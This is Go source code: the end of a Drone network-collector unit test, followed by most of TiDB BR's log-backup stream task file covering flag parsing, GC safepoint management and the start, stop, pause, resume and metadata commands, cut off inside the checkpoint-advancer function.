	mockNetworks := []types.NetworkResource{
		{Name: "a180b24e38ed", Driver: "bridge", Labels: map[string]string{"io.drone.expires": "915148800"}},
		{Name: "bfbf8512f21e", Driver: "bridge", Labels: map[string]string{"io.drone.expires": "915148800"}},
	}
	mockErr := errors.New("cannot remove network")
	client := mocks.NewMockAPIClient(controller)
	client.EXPECT().NetworkList(gomock.Any(), gomock.Any()).Return(mockNetworks, nil)
	client.EXPECT().NetworkRemove(gomock.Any(), mockNetworks[0].Name).Return(mockErr)
	client.EXPECT().NetworkRemove(gomock.Any(), mockNetworks[1].Name).Return(nil)
	c := New(client).(*collector)
	err := c.collectNetworks(context.Background())
	if err == nil {
		t.Errorf("Expected multi-error returned")
	}
}
|
// Copyright 2022 PingCAP, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package task
import (
"bytes"
"context"
"encoding/binary"
"fmt"
"net/http"
"slices"
"strings"
"sync"
"time"
"github.com/docker/go-units"
"github.com/fatih/color"
"github.com/opentracing/opentracing-go"
"github.com/pingcap/errors"
"github.com/pingcap/failpoint"
backuppb "github.com/pingcap/kvproto/pkg/brpb"
"github.com/pingcap/log"
"github.com/pingcap/tidb/br/pkg/backup"
"github.com/pingcap/tidb/br/pkg/checkpoint"
"github.com/pingcap/tidb/br/pkg/conn"
berrors "github.com/pingcap/tidb/br/pkg/errors"
"github.com/pingcap/tidb/br/pkg/glue"
"github.com/pingcap/tidb/br/pkg/httputil"
"github.com/pingcap/tidb/br/pkg/logutil"
"github.com/pingcap/tidb/br/pkg/metautil"
"github.com/pingcap/tidb/br/pkg/restore"
"github.com/pingcap/tidb/br/pkg/restore/tiflashrec"
"github.com/pingcap/tidb/br/pkg/storage"
"github.com/pingcap/tidb/br/pkg/stream"
"github.com/pingcap/tidb/br/pkg/streamhelper"
advancercfg "github.com/pingcap/tidb/br/pkg/streamhelper/config"
"github.com/pingcap/tidb/br/pkg/streamhelper/daemon"
"github.com/pingcap/tidb/br/pkg/summary"
"github.com/pingcap/tidb/br/pkg/utils"
"github.com/pingcap/tidb/ddl"
"github.com/pingcap/tidb/kv"
"github.com/pingcap/tidb/parser/model"
"github.com/pingcap/tidb/util/mathutil"
"github.com/pingcap/tidb/util/sqlexec"
"github.com/spf13/pflag"
"github.com/tikv/client-go/v2/config"
"github.com/tikv/client-go/v2/oracle"
clientv3 "go.etcd.io/etcd/client/v3"
"go.uber.org/zap"
)
const (
flagYes = "yes"
flagUntil = "until"
flagStreamJSONOutput = "json"
flagStreamTaskName = "task-name"
flagStreamStartTS = "start-ts"
flagStreamEndTS = "end-ts"
flagGCSafePointTTS = "gc-ttl"
)
var (
StreamStart = "log start"
StreamStop = "log stop"
StreamPause = "log pause"
StreamResume = "log resume"
StreamStatus = "log status"
StreamTruncate = "log truncate"
StreamMetadata = "log metadata"
StreamCtl = "log ctl"
skipSummaryCommandList = map[string]struct{}{
StreamStatus: {},
StreamTruncate: {},
}
// rawKVBatchCount specifies the count of entries that the rawkv client puts into TiKV.
rawKVBatchCount = 64
streamShiftDuration = time.Hour
)
var StreamCommandMap = map[string]func(c context.Context, g glue.Glue, cmdName string, cfg *StreamConfig) error{
StreamStart: RunStreamStart,
StreamStop: RunStreamStop,
StreamPause: RunStreamPause,
StreamResume: RunStreamResume,
StreamStatus: RunStreamStatus,
StreamTruncate: RunStreamTruncate,
StreamMetadata: RunStreamMetadata,
StreamCtl: RunStreamAdvancer,
}
// StreamConfig specifies the configure about backup stream
type StreamConfig struct {
Config
TaskName string `json:"task-name" toml:"task-name"`
// StartTS usually equals the tso of full-backup, but user can reset it
StartTS uint64 `json:"start-ts" toml:"start-ts"`
EndTS uint64 `json:"end-ts" toml:"end-ts"`
// SafePointTTL ensures TiKV can scan entries not being GC at [startTS, currentTS]
SafePointTTL int64 `json:"safe-point-ttl" toml:"safe-point-ttl"`
// Spec for the command `truncate`, we should truncate the until when?
Until uint64 `json:"until" toml:"until"`
DryRun bool `json:"dry-run" toml:"dry-run"`
SkipPrompt bool `json:"skip-prompt" toml:"skip-prompt"`
// Spec for the command `status`.
JSONOutput bool `json:"json-output" toml:"json-output"`
// Spec for the command `advancer`.
AdvancerCfg advancercfg.Config `json:"advancer-config" toml:"advancer-config"`
}
// makeStorage parses the configured backend and opens the external
// storage used by the stream task, propagating credential settings and
// the shared metadata-download HTTP client.
// Cleanup: the result is named extStorage instead of shadowing the
// imported "storage" package, which made the tail of the function
// confusing and blocked further package references.
func (cfg *StreamConfig) makeStorage(ctx context.Context) (storage.ExternalStorage, error) {
	u, err := storage.ParseBackend(cfg.Storage, &cfg.BackendOptions)
	if err != nil {
		return nil, errors.Trace(err)
	}
	opts := storage.ExternalStorageOptions{
		NoCredentials: cfg.NoCreds,
		SendCredentials: cfg.SendCreds,
		HTTPClient: storage.GetDefaultHttpClient(cfg.MetadataDownloadBatchSize),
	}
	extStorage, err := storage.New(ctx, u, &opts)
	if err != nil {
		return nil, errors.Trace(err)
	}
	return extStorage, nil
}
// DefineStreamStartFlags defines flags used for `stream start`
func DefineStreamStartFlags(flags *pflag.FlagSet) {
DefineStreamCommonFlags(flags)
flags.String(flagStreamStartTS, "",
"usually equals last full backupTS, used for backup log. Default value is current ts.\n"+
"support TSO or datetime, e.g. '400036290571534337' or '2018-05-11 01:42:23+0800'.")
// 999999999999999999 means 2090-11-18 22:07:45
flags.String(flagStreamEndTS, "999999999999999999", "end ts, indicate stopping observe after endTS"+
"support TSO or datetime")
_ = flags.MarkHidden(flagStreamEndTS)
flags.Int64(flagGCSafePointTTS, utils.DefaultStreamStartSafePointTTL,
"the TTL (in seconds) that PD holds for BR's GC safepoint")
_ = flags.MarkHidden(flagGCSafePointTTS)
}
func DefineStreamPauseFlags(flags *pflag.FlagSet) {
DefineStreamCommonFlags(flags)
flags.Int64(flagGCSafePointTTS, utils.DefaultStreamPauseSafePointTTL,
"the TTL (in seconds) that PD holds for BR's GC safepoint")
}
// DefineStreamCommonFlags define common flags for `stream task`
func DefineStreamCommonFlags(flags *pflag.FlagSet) {
flags.String(flagStreamTaskName, "", "The task name for the backup log task.")
}
func DefineStreamStatusCommonFlags(flags *pflag.FlagSet) {
flags.String(flagStreamTaskName, stream.WildCard,
"The task name for backup stream log. If default, get status of all of tasks",
)
flags.Bool(flagStreamJSONOutput, false,
"Print JSON as the output.",
)
}
func DefineStreamTruncateLogFlags(flags *pflag.FlagSet) {
flags.String(flagUntil, "", "Remove all backup data until this TS."+
"(support TSO or datetime, e.g. '400036290571534337' or '2018-05-11 01:42:23+0800'.)")
flags.Bool(flagDryRun, false, "Run the command but don't really delete the files.")
flags.BoolP(flagYes, "y", false, "Skip all prompts and always execute the command.")
}
func (cfg *StreamConfig) ParseStreamStatusFromFlags(flags *pflag.FlagSet) error {
var err error
cfg.JSONOutput, err = flags.GetBool(flagStreamJSONOutput)
if err != nil {
return errors.Trace(err)
}
if err = cfg.ParseStreamCommonFromFlags(flags); err != nil {
return errors.Trace(err)
}
return nil
}
func (cfg *StreamConfig) ParseStreamTruncateFromFlags(flags *pflag.FlagSet) error {
tsString, err := flags.GetString(flagUntil)
if err != nil {
return errors.Trace(err)
}
if cfg.Until, err = ParseTSString(tsString, true); err != nil {
return errors.Trace(err)
}
if cfg.SkipPrompt, err = flags.GetBool(flagYes); err != nil {
return errors.Trace(err)
}
if cfg.DryRun, err = flags.GetBool(flagDryRun); err != nil {
return errors.Trace(err)
}
return nil
}
// ParseStreamStartFromFlags parses parameters for `stream start`: the
// common task name, the start/end TS (accepting TSO or datetime
// strings), and the GC safepoint TTL, which falls back to the default
// when non-positive.
func (cfg *StreamConfig) ParseStreamStartFromFlags(flags *pflag.FlagSet) error {
	err := cfg.ParseStreamCommonFromFlags(flags)
	if err != nil {
		return errors.Trace(err)
	}
	tsString, err := flags.GetString(flagStreamStartTS)
	if err != nil {
		return errors.Trace(err)
	}
	if cfg.StartTS, err = ParseTSString(tsString, true); err != nil {
		return errors.Trace(err)
	}
	tsString, err = flags.GetString(flagStreamEndTS)
	if err != nil {
		return errors.Trace(err)
	}
	if cfg.EndTS, err = ParseTSString(tsString, true); err != nil {
		return errors.Trace(err)
	}
	if cfg.SafePointTTL, err = flags.GetInt64(flagGCSafePointTTS); err != nil {
		return errors.Trace(err)
	}
	// Guard against nonsensical TTLs from the flag.
	if cfg.SafePointTTL <= 0 {
		cfg.SafePointTTL = utils.DefaultStreamStartSafePointTTL
	}
	return nil
}
// ParseStreamPauseFromFlags parses the parameters for `stream pause`:
// the common options plus the GC safe point TTL (defaulted when
// non-positive).
func (cfg *StreamConfig) ParseStreamPauseFromFlags(flags *pflag.FlagSet) error {
	if err := cfg.ParseStreamCommonFromFlags(flags); err != nil {
		return errors.Trace(err)
	}

	ttl, err := flags.GetInt64(flagGCSafePointTTS)
	if err != nil {
		return errors.Trace(err)
	}
	cfg.SafePointTTL = ttl
	// A non-positive TTL means "use the default".
	if cfg.SafePointTTL <= 0 {
		cfg.SafePointTTL = utils.DefaultStreamPauseSafePointTTL
	}
	return nil
}
// ParseStreamCommonFromFlags parses the parameters shared by every
// `stream task` subcommand; currently that is only the mandatory task name.
func (cfg *StreamConfig) ParseStreamCommonFromFlags(flags *pflag.FlagSet) error {
	name, err := flags.GetString(flagStreamTaskName)
	if err != nil {
		return errors.Trace(err)
	}
	cfg.TaskName = name
	if cfg.TaskName == "" {
		return errors.Annotate(berrors.ErrInvalidArgument, "Miss parameters task-name")
	}
	return nil
}
// streamMgr groups the long-lived handles used by the `stream` subcommands.
type streamMgr struct {
	cfg *StreamConfig // parsed command-line configuration
	mgr *conn.Mgr     // connection manager for PD/TiKV; released by close()
	bc *backup.Client // backup storage client; only set for `stream start`
	httpCli *http.Client // used for requirement checks; only set for `stream start`
}
// NewStreamMgr creates a streamMgr: it dials PD/TiKV and, for `stream start`
// only, additionally prepares the backup storage client and an HTTP client
// for requirement checks.
//
// The returned streamMgr owns the connection manager; callers must release
// it via streamMgr.close().
func NewStreamMgr(ctx context.Context, cfg *StreamConfig, g glue.Glue, isStreamStart bool) (*streamMgr, error) {
	mgr, err := NewMgr(ctx, g, cfg.PD, cfg.TLS, GetKeepalive(&cfg.Config),
		cfg.CheckRequirements, true, conn.StreamVersionChecker)
	if err != nil {
		return nil, errors.Trace(err)
	}
	// Release the manager when any later step fails. Every error path below
	// must assign to this outer `err` (no `:=` shadowing in inner scopes),
	// otherwise this cleanup is skipped and mgr leaks — which is exactly the
	// bug fixed here: the old `backend, err := ...` shadowed `err`.
	defer func() {
		if err != nil {
			mgr.Close()
		}
	}()

	// just stream start need Storage
	s := &streamMgr{
		cfg: cfg,
		mgr: mgr,
	}
	if isStreamStart {
		client := backup.NewBackupClient(ctx, mgr)

		var backend *backuppb.StorageBackend
		backend, err = storage.ParseBackend(cfg.Storage, &cfg.BackendOptions)
		if err != nil {
			return nil, errors.Trace(err)
		}

		opts := storage.ExternalStorageOptions{
			NoCredentials:   cfg.NoCreds,
			SendCredentials: cfg.SendCreds,
		}
		if err = client.SetStorage(ctx, backend, &opts); err != nil {
			return nil, errors.Trace(err)
		}
		s.bc = client

		// create http client to do some requirements check.
		s.httpCli = httputil.NewClient(mgr.GetTLSConfig())
	}
	return s, nil
}
// close releases the underlying connection manager.
func (s *streamMgr) close() {
	s.mgr.Close()
}
// checkLock reports whether the lock file already exists on the backup
// storage, i.e. whether this storage has been used by a stream task before.
func (s *streamMgr) checkLock(ctx context.Context) (bool, error) {
	return s.bc.GetStorage().FileExists(ctx, metautil.LockFile)
}
// setLock writes the lock file to the backup storage, marking it as owned by
// this task.
func (s *streamMgr) setLock(ctx context.Context) error {
	return s.bc.SetLockFile(ctx)
}
// adjustAndCheckStartTS defaults cfg.StartTS to the current TSO when it is
// unset, then validates the invariant startTS <= currentTS < endTS.
func (s *streamMgr) adjustAndCheckStartTS(ctx context.Context) error {
	currentTS, err := s.mgr.GetTS(ctx)
	if err != nil {
		return errors.Trace(err)
	}

	switch {
	case s.cfg.StartTS == 0:
		// No explicit start ts: begin from "now".
		s.cfg.StartTS = currentTS
	case s.cfg.StartTS > currentTS:
		return errors.Annotatef(berrors.ErrInvalidArgument,
			"invalid timestamps, startTS %d should be smaller than currentTS %d",
			s.cfg.StartTS, currentTS)
	}
	if s.cfg.EndTS <= currentTS {
		return errors.Annotatef(berrors.ErrInvalidArgument,
			"invalid timestamps, endTS %d should be larger than currentTS %d",
			s.cfg.EndTS, currentTS)
	}
	return nil
}
// checkImportTaskRunning returns an error when any lightning/restore task is
// registered in etcd, because log backup must not run concurrently with a
// physical import.
func (s *streamMgr) checkImportTaskRunning(ctx context.Context) error {
	list, err := utils.GetImportTasksFrom(ctx, s.mgr.GetDomain().GetEtcdClient())
	if err != nil {
		return errors.Trace(err)
	}
	if list.Empty() {
		return nil
	}
	return errors.Errorf("There are some lightning/restore tasks running: %s"+
		"please stop or wait finishing at first. "+
		"If the lightning/restore task is forced to terminate by system, "+
		"please wait for ttl to decrease to 0.", list.MessageToUser())
}
// setGCSafePoint registers a BR service safe point on PD, after verifying
// that the requested BackupTS has not already been garbage collected.
func (s *streamMgr) setGCSafePoint(ctx context.Context, sp utils.BRServiceSafePoint) error {
	if err := utils.CheckGCSafePoint(ctx, s.mgr.GetPDClient(), sp.BackupTS); err != nil {
		return errors.Annotatef(err,
			"failed to check gc safePoint, ts %v", sp.BackupTS)
	}
	if err := utils.UpdateServiceSafePoint(ctx, s.mgr.GetPDClient(), sp); err != nil {
		return errors.Trace(err)
	}
	log.Info("set stream safePoint", zap.Object("safePoint", sp))
	return nil
}
// buildObserveRanges assembles the key ranges the log backup task observes:
// the meta range plus the data ranges derived from the table filter, sorted
// by start key.
func (s *streamMgr) buildObserveRanges(ctx context.Context) ([]kv.KeyRange, error) {
	dataRanges, err := stream.BuildObserveDataRanges(
		s.mgr.GetStorage(),
		s.cfg.FilterStr,
		s.cfg.TableFilter,
		s.cfg.StartTS,
	)
	if err != nil {
		return nil, errors.Trace(err)
	}

	metaRange := stream.BuildObserveMetaRange()
	ranges := make([]kv.KeyRange, 0, len(dataRanges)+1)
	ranges = append(ranges, *metaRange)
	ranges = append(ranges, dataRanges...)
	slices.SortFunc(ranges, func(a, b kv.KeyRange) int {
		return bytes.Compare(a.StartKey, b.StartKey)
	})
	return ranges, nil
}
// backupFullSchemas writes a snapshot of all schemas visible at cfg.StartTS
// into the backup storage as a backupmeta file, so PiTR can later rebuild
// table information from it.
func (s *streamMgr) backupFullSchemas(ctx context.Context, g glue.Glue) error {
	clusterVersion, err := s.mgr.GetClusterVersion(ctx)
	if err != nil {
		return errors.Trace(err)
	}
	metaWriter := metautil.NewMetaWriter(s.bc.GetStorage(), metautil.MetaFileSize, false, metautil.MetaFile, nil)
	metaWriter.Update(func(m *backuppb.BackupMeta) {
		// save log startTS to backupmeta file
		m.StartVersion = s.cfg.StartTS
		m.ClusterId = s.bc.GetClusterID()
		m.ClusterVersion = clusterVersion
	})
	// Enumerate every db/table at StartTS and hand them to the schema backup.
	schemas := backup.NewBackupSchemas(func(storage kv.Storage, fn func(*model.DBInfo, *model.TableInfo)) error {
		return backup.BuildFullSchema(storage, s.cfg.StartTS, func(dbInfo *model.DBInfo, tableInfo *model.TableInfo) {
			fn(dbInfo, tableInfo)
		})
	}, 0)
	err = schemas.BackupSchemas(ctx, metaWriter, nil, s.mgr.GetStorage(), nil,
		s.cfg.StartTS, backup.DefaultSchemaConcurrency, 0, true, nil)
	if err != nil {
		return errors.Trace(err)
	}
	// Flush persists the accumulated metadata to the external storage.
	if err = metaWriter.FlushBackupMeta(ctx); err != nil {
		return errors.Trace(err)
	}
	return nil
}
// checkStreamStartEnable verifies the cluster can accept a new log-backup
// task: TiKV must have `log-backup.enable` switched on, and no ingest-mode
// add-index DDL jobs may be in flight.
func (s *streamMgr) checkStreamStartEnable(g glue.Glue) error {
	se, err := g.CreateSession(s.mgr.GetStorage())
	if err != nil {
		return errors.Trace(err)
	}
	execCtx := se.GetSessionCtx().(sqlexec.RestrictedSQLExecutor)

	enabled, err := utils.IsLogBackupEnabled(execCtx)
	if err != nil {
		return errors.Trace(err)
	}
	if !enabled {
		return errors.New("Unable to create task about log-backup. " +
			"please set TiKV config `log-backup.enable` to true and restart TiKVs.")
	}
	if !ddl.IngestJobsNotExisted(se.GetSessionCtx()) {
		return errors.Annotate(berrors.ErrUnknown,
			"Unable to create log backup task. Please wait until the DDL jobs(add index with ingest method) are finished.")
	}
	return nil
}
// RestoreFunc restores a previously saved setting; here it receives the
// gc.ratio-threshold value to write back.
type RestoreFunc func(string) error

// KeepGcDisabled disables GC in TiKV by setting gc.ratio-threshold to
// "-1.0". It returns a function that writes back a given ratio, together
// with the ratio that was in effect before the call.
func KeepGcDisabled(g glue.Glue, store kv.Storage) (RestoreFunc, string, error) {
	se, err := g.CreateSession(store)
	if err != nil {
		return nil, "", errors.Trace(err)
	}
	execCtx := se.GetSessionCtx().(sqlexec.RestrictedSQLExecutor)

	previousRatio, err := utils.GetGcRatio(execCtx)
	if err != nil {
		return nil, "", errors.Trace(err)
	}
	if err = utils.SetGcRatio(execCtx, "-1.0"); err != nil {
		return nil, "", errors.Trace(err)
	}

	// A negative saved ratio means GC was already disabled, which is not a
	// normal state to restore to; fall back to the default after PiTR.
	if strings.HasPrefix(previousRatio, "-") {
		previousRatio = utils.DefaultGcRatioVal
	}

	restoreRatio := func(ratio string) error {
		return utils.SetGcRatio(execCtx, ratio)
	}
	return restoreRatio, previousRatio, nil
}
// RunStreamCommand dispatches a `stream` subcommand by name and records the
// run's success or failure in the summary.
func RunStreamCommand(
	ctx context.Context,
	g glue.Glue,
	cmdName string,
	cfg *StreamConfig,
) error {
	cfg.Config.adjust()
	defer func() {
		// Some subcommands opt out of the summary line entirely.
		if _, skipped := skipSummaryCommandList[cmdName]; !skipped {
			summary.Summary(cmdName)
		}
	}()

	commandFn, ok := StreamCommandMap[cmdName]
	if !ok {
		return errors.Annotatef(berrors.ErrInvalidArgument, "invalid command %s", cmdName)
	}

	err := commandFn(ctx, g, cmdName, cfg)
	if err != nil {
		log.Error("failed to stream", zap.String("command", cmdName), zap.Error(err))
		summary.SetSuccessStatus(false)
		summary.CollectFailureUnit(cmdName, err)
		return err
	}
	summary.SetSuccessStatus(true)
	return nil
}
// RunStreamStart creates (or restarts) a log backup task.
//
// Flow: verify the cluster can run log backup, ensure no conflicting import
// task or existing stream task, pin a GC service safe point so data from
// StartTS onward survives, then register the task in etcd.
func RunStreamStart(
	c context.Context,
	g glue.Glue,
	cmdName string,
	cfg *StreamConfig,
) error {
	ctx, cancelFn := context.WithCancel(c)
	defer cancelFn()
	if span := opentracing.SpanFromContext(ctx); span != nil && span.Tracer() != nil {
		span1 := span.Tracer().StartSpan("task.RunStreamStart", opentracing.ChildOf(span.Context()))
		defer span1.Finish()
		ctx = opentracing.ContextWithSpan(ctx, span1)
	}
	streamMgr, err := NewStreamMgr(ctx, cfg, g, true)
	if err != nil {
		return errors.Trace(err)
	}
	defer streamMgr.close()
	// TiKV must have log-backup enabled and no ingest-mode DDL in flight.
	if err = streamMgr.checkStreamStartEnable(g); err != nil {
		return errors.Trace(err)
	}
	if err = streamMgr.adjustAndCheckStartTS(ctx); err != nil {
		return errors.Trace(err)
	}
	if err = streamMgr.checkImportTaskRunning(ctx); err != nil {
		return errors.Trace(err)
	}
	cli := streamhelper.NewMetaDataClient(streamMgr.mgr.GetDomain().GetEtcdClient())
	// It supports single stream log task currently.
	if count, err := cli.GetTaskCount(ctx); err != nil {
		return errors.Trace(err)
	} else if count > 0 {
		return errors.Annotate(berrors.ErrStreamLogTaskExist, "It supports single stream log task currently")
	}
	// The presence of the lock file tells a restart from a fresh start.
	exist, err := streamMgr.checkLock(ctx)
	if err != nil {
		return errors.Trace(err)
	}
	// exist is true, which represents restart a stream task. Or create a new stream task.
	if exist {
		// Restart: resume from the max ts of the logs already on storage,
		// refusing storages written by a different cluster.
		logInfo, err := getLogRange(ctx, &cfg.Config)
		if err != nil {
			return errors.Trace(err)
		}
		if logInfo.clusterID > 0 && logInfo.clusterID != streamMgr.bc.GetClusterID() {
			return errors.Annotatef(berrors.ErrInvalidArgument,
				"the stream log files from cluster ID:%v and current cluster ID:%v ",
				logInfo.clusterID, streamMgr.bc.GetClusterID())
		}
		cfg.StartTS = logInfo.logMaxTS
		if err = streamMgr.setGCSafePoint(
			ctx,
			utils.BRServiceSafePoint{
				ID: utils.MakeSafePointID(),
				TTL: cfg.SafePointTTL,
				BackupTS: cfg.StartTS,
			},
		); err != nil {
			return errors.Trace(err)
		}
	} else {
		// New task: pin GC first, then take the lock and snapshot all schemas
		// at StartTS — this ordering keeps the snapshot's data from being GC'd.
		if err = streamMgr.setGCSafePoint(
			ctx,
			utils.BRServiceSafePoint{
				ID: utils.MakeSafePointID(),
				TTL: cfg.SafePointTTL,
				BackupTS: cfg.StartTS,
			},
		); err != nil {
			return errors.Trace(err)
		}
		if err = streamMgr.setLock(ctx); err != nil {
			return errors.Trace(err)
		}
		if err = streamMgr.backupFullSchemas(ctx, g); err != nil {
			return errors.Trace(err)
		}
	}
	ranges, err := streamMgr.buildObserveRanges(ctx)
	if err != nil {
		return errors.Trace(err)
	} else if len(ranges) == 0 {
		// nothing to backup
		pdAddress := strings.Join(cfg.PD, ",")
		log.Warn("Nothing to observe, maybe connected to cluster for restoring",
			zap.String("PD address", pdAddress))
		return errors.Annotate(berrors.ErrInvalidArgument, "nothing need to observe")
	}
	ti := streamhelper.TaskInfo{
		PBInfo: backuppb.StreamBackupTaskInfo{
			Storage: streamMgr.bc.GetStorageBackend(),
			StartTs: cfg.StartTS,
			EndTs: cfg.EndTS,
			Name: cfg.TaskName,
			TableFilter: cfg.FilterStr,
			CompressionType: backuppb.CompressionType_ZSTD,
		},
		Ranges: ranges,
		Pausing: false,
	}
	// Registering the task in etcd makes TiKV start observing the ranges.
	if err = cli.PutTask(ctx, ti); err != nil {
		return errors.Trace(err)
	}
	summary.Log(cmdName, ti.ZapTaskInfo()...)
	return nil
}
// RunStreamMetadata prints the minimal and maximal resolvable timestamps of
// the log backup found on the configured storage.
func RunStreamMetadata(
	c context.Context,
	g glue.Glue,
	cmdName string,
	cfg *StreamConfig,
) error {
	ctx, cancelFn := context.WithCancel(c)
	defer cancelFn()

	if span := opentracing.SpanFromContext(ctx); span != nil && span.Tracer() != nil {
		span1 := span.Tracer().StartSpan(
			"task.RunStreamCheckLog",
			opentracing.ChildOf(span.Context()),
		)
		defer span1.Finish()
		ctx = opentracing.ContextWithSpan(ctx, span1)
	}

	logInfo, err := getLogRange(ctx, &cfg.Config)
	if err != nil {
		return errors.Trace(err)
	}

	minDate := stream.FormatDate(oracle.GetTimeFromTS(logInfo.logMinTS))
	maxDate := stream.FormatDate(oracle.GetTimeFromTS(logInfo.logMaxTS))
	summary.Log(cmdName,
		zap.Uint64("log-min-ts", logInfo.logMinTS),
		zap.String("log-min-date", minDate),
		zap.Uint64("log-max-ts", logInfo.logMaxTS),
		zap.String("log-max-date", maxDate),
	)
	return nil
}
// RunStreamStop deletes a running log backup task and then, best-effort,
// clears the service safe point the task held on PD.
func RunStreamStop(
	c context.Context,
	g glue.Glue,
	cmdName string,
	cfg *StreamConfig,
) error {
	ctx, cancelFn := context.WithCancel(c)
	defer cancelFn()

	if span := opentracing.SpanFromContext(ctx); span != nil && span.Tracer() != nil {
		span1 := span.Tracer().StartSpan(
			"task.RunStreamStop",
			opentracing.ChildOf(span.Context()),
		)
		defer span1.Finish()
		ctx = opentracing.ContextWithSpan(ctx, span1)
	}

	streamMgr, err := NewStreamMgr(ctx, cfg, g, false)
	if err != nil {
		return errors.Trace(err)
	}
	defer streamMgr.close()

	cli := streamhelper.NewMetaDataClient(streamMgr.mgr.GetDomain().GetEtcdClient())
	// to add backoff
	ti, err := cli.GetTask(ctx, cfg.TaskName)
	if err != nil {
		return errors.Trace(err)
	}
	if err = cli.DeleteTask(ctx, cfg.TaskName); err != nil {
		return errors.Trace(err)
	}

	// Best-effort removal of the task's safe point (BackupTS 0 with the
	// default TTL); a failure here is only logged, never fatal.
	sp := utils.BRServiceSafePoint{
		ID:       buildPauseSafePointName(ti.Info.Name),
		TTL:      utils.DefaultStreamStartSafePointTTL,
		BackupTS: 0,
	}
	if err := streamMgr.setGCSafePoint(ctx, sp); err != nil {
		log.Warn("failed to remove safe point", zap.String("error", err.Error()))
	}

	summary.Log(cmdName, logutil.StreamBackupTaskInfo(&ti.Info))
	return nil
}
// RunStreamPause pauses a stream task.
//
// Before pausing, it pins a GC safe point at the task's global checkpoint so
// the not-yet-backed-up data survives GC while the task stays paused.
func RunStreamPause(
	c context.Context,
	g glue.Glue,
	cmdName string,
	cfg *StreamConfig,
) error {
	ctx, cancelFn := context.WithCancel(c)
	defer cancelFn()
	if span := opentracing.SpanFromContext(ctx); span != nil && span.Tracer() != nil {
		span1 := span.Tracer().StartSpan(
			"task.RunStreamPause",
			opentracing.ChildOf(span.Context()),
		)
		defer span1.Finish()
		ctx = opentracing.ContextWithSpan(ctx, span1)
	}
	streamMgr, err := NewStreamMgr(ctx, cfg, g, false)
	if err != nil {
		return errors.Trace(err)
	}
	defer streamMgr.close()
	cli := streamhelper.NewMetaDataClient(streamMgr.mgr.GetDomain().GetEtcdClient())
	// to add backoff
	ti, isPaused, err := cli.GetTaskWithPauseStatus(ctx, cfg.TaskName)
	if err != nil {
		return errors.Trace(err)
	} else if isPaused {
		return errors.Annotatef(berrors.ErrKVUnknown, "The task %s is paused already.", cfg.TaskName)
	}
	globalCheckPointTS, err := ti.GetGlobalCheckPointTS(ctx)
	if err != nil {
		return errors.Trace(err)
	}
	// Pin GC at the checkpoint BEFORE pausing so no pending log data is lost.
	if err = streamMgr.setGCSafePoint(
		ctx,
		utils.BRServiceSafePoint{
			ID: buildPauseSafePointName(ti.Info.Name),
			TTL: cfg.SafePointTTL,
			BackupTS: globalCheckPointTS,
		},
	); err != nil {
		return errors.Trace(err)
	}
	err = cli.PauseTask(ctx, cfg.TaskName)
	if err != nil {
		return errors.Trace(err)
	}
	summary.Log(cmdName, logutil.StreamBackupTaskInfo(&ti.Info))
	return nil
}
// RunStreamResume resumes a paused stream task.
//
// It refuses to resume when the task's global checkpoint has already been
// garbage collected (the log would have a hole), clears the task's last
// error, and finally refreshes the pause-time safe point with the default
// TTL (per the warn message, this is how the safe point gets removed).
func RunStreamResume(
	c context.Context,
	g glue.Glue,
	cmdName string,
	cfg *StreamConfig,
) error {
	ctx, cancelFn := context.WithCancel(c)
	defer cancelFn()
	if span := opentracing.SpanFromContext(ctx); span != nil && span.Tracer() != nil {
		span1 := span.Tracer().StartSpan(
			"task.RunStreamResume",
			opentracing.ChildOf(span.Context()),
		)
		defer span1.Finish()
		ctx = opentracing.ContextWithSpan(ctx, span1)
	}
	streamMgr, err := NewStreamMgr(ctx, cfg, g, false)
	if err != nil {
		return errors.Trace(err)
	}
	defer streamMgr.close()
	cli := streamhelper.NewMetaDataClient(streamMgr.mgr.GetDomain().GetEtcdClient())
	// to add backoff
	ti, isPaused, err := cli.GetTaskWithPauseStatus(ctx, cfg.TaskName)
	if err != nil {
		return errors.Trace(err)
	} else if !isPaused {
		return errors.Annotatef(berrors.ErrKVUnknown,
			"The task %s is active already.", cfg.TaskName)
	}
	globalCheckPointTS, err := ti.GetGlobalCheckPointTS(ctx)
	if err != nil {
		return errors.Trace(err)
	}
	// The checkpoint must still be within GC's retained window; otherwise
	// resuming would leave an unrecoverable gap in the log.
	err = utils.CheckGCSafePoint(ctx, streamMgr.mgr.GetPDClient(), globalCheckPointTS)
	if err != nil {
		return errors.Annotatef(err, "the global checkpoint ts: %v(%s) has been gc. ",
			globalCheckPointTS, oracle.GetTimeFromTS(globalCheckPointTS))
	}
	err = cli.ResumeTask(ctx, cfg.TaskName)
	if err != nil {
		return errors.Trace(err)
	}
	err = cli.CleanLastErrorOfTask(ctx, cfg.TaskName)
	if err != nil {
		return err
	}
	// Best-effort: refresh the pause-time safe point; failure is only logged.
	if err := streamMgr.setGCSafePoint(ctx,
		utils.BRServiceSafePoint{
			ID: buildPauseSafePointName(ti.Info.Name),
			TTL: utils.DefaultStreamStartSafePointTTL,
			BackupTS: globalCheckPointTS,
		},
	); err != nil {
		log.Warn("failed to remove safe point",
			zap.Uint64("safe-point", globalCheckPointTS), zap.String("error", err.Error()))
	}
	summary.Log(cmdName, logutil.StreamBackupTaskInfo(&ti.Info))
	return nil
}
// RunStreamAdvancer runs a standalone checkpoint-advancer daemon that ticks
// the log backup checkpoint forward; ownership is coordinated via etcd.
//
// NOTE(review): mgr and etcdCLI are never closed on any path here (including
// the early error returns) — confirm whether explicit cleanup is needed.
func RunStreamAdvancer(c context.Context, g glue.Glue, cmdName string, cfg *StreamConfig) error {
	ctx, cancel := context.WithCancel(c)
	defer cancel()
	mgr, err := NewMgr(ctx, g, cfg.PD, cfg.TLS, GetKeepalive(&cfg.Config),
		cfg.CheckRequirements, false, conn.StreamVersionChecker)
	if err != nil {
		return err
	}
	etcdCLI, err := dialEtcdWithCfg(ctx, cfg.Config)
	if err != nil {
		return err
	}
	env := streamhelper.CliEnv(mgr.StoreManager, etcdCLI)
	advancer := streamhelper.NewCheckpointAdvancer(env)
	advancer.UpdateConfig(cfg.AdvancerCfg)
